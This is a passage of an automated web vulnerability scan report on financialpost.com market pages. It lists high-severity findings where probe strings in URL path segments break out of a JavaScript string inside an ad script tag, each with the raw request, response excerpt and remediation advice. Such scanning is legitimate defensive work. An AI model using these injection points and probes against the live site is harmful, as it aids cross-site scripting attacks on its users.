Server: Microsoft-IIS/6.0
p3p: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:09:15 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:09:15 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 43256


...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/markets/fundsa40f3';b938dde38ac/index;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=markets;kw=fundsa40f3';b938dde38ac;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=48027550?">
...[SNIP]...

1.139. http://www.financialpost.com/markets/funds/profile/index.html [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /markets/funds/profile/index.html

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5926e'%3b02d83b6f42d was submitted in the REST URL parameter 1. This input was echoed as 5926e';02d83b6f42d in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /markets5926e'%3b02d83b6f42d/funds/profile/index.html HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;

Response

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
p3p: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:09:04 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:09:04 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 43501


...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/markets5926e';02d83b6f42d/funds/profile/index;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=markets5926e';02d83b6f42d;kw=funds;kw=profile;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=68820856?">
...[SNIP]...

1.140. http://www.financialpost.com/markets/funds/profile/index.html [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /markets/funds/profile/index.html

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f3ad1'%3bf27dab35307 was submitted in the REST URL parameter 2. This input was echoed as f3ad1';f27dab35307 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /markets/fundsf3ad1'%3bf27dab35307/profile/index.html HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;

Response

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
p3p: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:09:09 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:09:09 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 43465


...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/markets/fundsf3ad1';f27dab35307/profile/index;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=markets;kw=fundsf3ad1';f27dab35307;kw=profile;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=88357887?">
...[SNIP]...

1.141. http://www.financialpost.com/markets/funds/profile/index.html [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /markets/funds/profile/index.html

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1e927'%3b27cd8eb768f was submitted in the REST URL parameter 3. This input was echoed as 1e927';27cd8eb768f in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /markets/funds/profile1e927'%3b27cd8eb768f/index.html HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;

Response

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
p3p: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:09:15 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:09:15 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 43430


...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/markets/funds/profile1e927';27cd8eb768f/index;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=markets;kw=funds;kw=profile1e927';27cd8eb768f;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=67456820?">
...[SNIP]...

1.142. http://www.financialpost.com/markets/funds/profile/index.html [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /markets/funds/profile/index.html

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6620c'%3bf0f4d8bb4e8 was submitted in the REST URL parameter 4. This input was echoed as 6620c';f0f4d8bb4e8 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /markets/funds/profile/6620c'%3bf0f4d8bb4e8 HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;

Response (redirected)

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:09:26 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:09:26 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 43497


...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/markets/funds/profile/6620c';f0f4d8bb4e8/index;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=markets;kw=funds;kw=profile;kw=6620c';f0f4d8bb4e8;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=93927840?">
...[SNIP]...

1.143. http://www.financialpost.com/markets/futures/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /markets/futures/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e18f6'%3bf39282e7ad7 was submitted in the REST URL parameter 1. This input was echoed as e18f6';f39282e7ad7 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /marketse18f6'%3bf39282e7ad7/futures/ HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;

Response (redirected)

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:09:07 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:09:07 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 36515


...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/marketse18f6';f39282e7ad7/futures/index;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=marketse18f6';f39282e7ad7;kw=futures;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=17941583?">
...[SNIP]...

1.144. http://www.financialpost.com/markets/futures/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /markets/futures/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5c53f'%3b3da8e6e0e07 was submitted in the REST URL parameter 2. This input was echoed as 5c53f';3da8e6e0e07 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /markets/futures5c53f'%3b3da8e6e0e07/ HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;

Response (redirected)

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
p3p: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:09:15 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:09:15 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 43296


...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/markets/futures5c53f';3da8e6e0e07/index;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=markets;kw=futures5c53f';3da8e6e0e07;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=14169631?">
...[SNIP]...

1.145. http://www.financialpost.com/markets/idms-terms.html [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /markets/idms-terms.html

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 26105'%3bf9077ffe571 was submitted in the REST URL parameter 1. This input was echoed as 26105';f9077ffe571 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /markets26105'%3bf9077ffe571/idms-terms.html HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;

Response

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
p3p: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:09:35 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:09:35 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 43169


...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/markets26105';f9077ffe571/idms-terms;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=markets26105';f9077ffe571;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=67880817?">
...[SNIP]...

1.146. http://www.financialpost.com/markets/idms-terms.html [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /markets/idms-terms.html

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 74189'%3b8943533dea2 was submitted in the REST URL parameter 2. This input was echoed as 74189';8943533dea2 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /markets/74189'%3b8943533dea2 HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;

Response (redirected)

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:09:48 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:09:48 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 36339


...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/markets/74189';8943533dea2/index;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=markets;kw=74189';8943533dea2;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=98767196?">
...[SNIP]...

1.147. http://www.financialpost.com/markets/key-numbers/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /markets/key-numbers/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 968a1'%3b5e5fba5ddd0 was submitted in the REST URL parameter 1. This input was echoed as 968a1';5e5fba5ddd0 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /markets968a1'%3b5e5fba5ddd0/key-numbers/ HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;

Response (redirected)

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:09:04 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:09:04 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 43412


...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/markets968a1';5e5fba5ddd0/key-numbers/index;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=markets968a1';5e5fba5ddd0;kw=key-numbers;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=13519179?">
...[SNIP]...

1.148. http://www.financialpost.com/markets/key-numbers/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /markets/key-numbers/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e8136'%3bb70724e675e was submitted in the REST URL parameter 2. This input was echoed as e8136';b70724e675e in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /markets/key-numberse8136'%3bb70724e675e/ HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;

Response (redirected)

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
p3p: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:09:14 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:09:14 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 43375


...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/markets/key-numberse8136';b70724e675e/index;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=markets;kw=key-numberse8136';b70724e675e;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=44882526?">
...[SNIP]...

1.149. http://www.financialpost.com/markets/news-alerts/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /markets/news-alerts/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1ede9'%3bbdd4c280d2b was submitted in the REST URL parameter 1. This input was echoed as 1ede9';bdd4c280d2b in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /markets1ede9'%3bbdd4c280d2b/news-alerts/ HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;

Response (redirected)

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
p3p: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:09:04 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:09:04 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 43411


...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/markets1ede9';bdd4c280d2b/news-alerts/index;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=markets1ede9';bdd4c280d2b;kw=news-alerts;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=68820856?">
...[SNIP]...

1.150. http://www.financialpost.com/markets/news-alerts/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /markets/news-alerts/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 49f35'%3b67eccc5e32c was submitted in the REST URL parameter 2. This input was echoed as 49f35';67eccc5e32c in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /markets/news-alerts49f35'%3b67eccc5e32c/ HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;

Response (redirected)

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:09:16 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:09:16 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 36559


...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/markets/news-alerts49f35';67eccc5e32c/index;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=markets;kw=news-alerts49f35';67eccc5e32c;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=66733803?">
...[SNIP]...

1.151. http://www.financialpost.com/markets/news/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /markets/news/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d964b'%3bf411e228aea was submitted in the REST URL parameter 1. This input was echoed as d964b';f411e228aea in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /marketsd964b'%3bf411e228aea/news/ HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;

Response (redirected)

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:09:15 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:09:15 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 43272


...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/marketsd964b';f411e228aea/news/index;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=marketsd964b';f411e228aea;kw=news;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=34439305?">
...[SNIP]...

1.152. http://www.financialpost.com/markets/news/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /markets/news/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 16774'%3b529b04d3c55 was submitted in the REST URL parameter 2. This input was echoed as 16774';529b04d3c55 in the application's response.

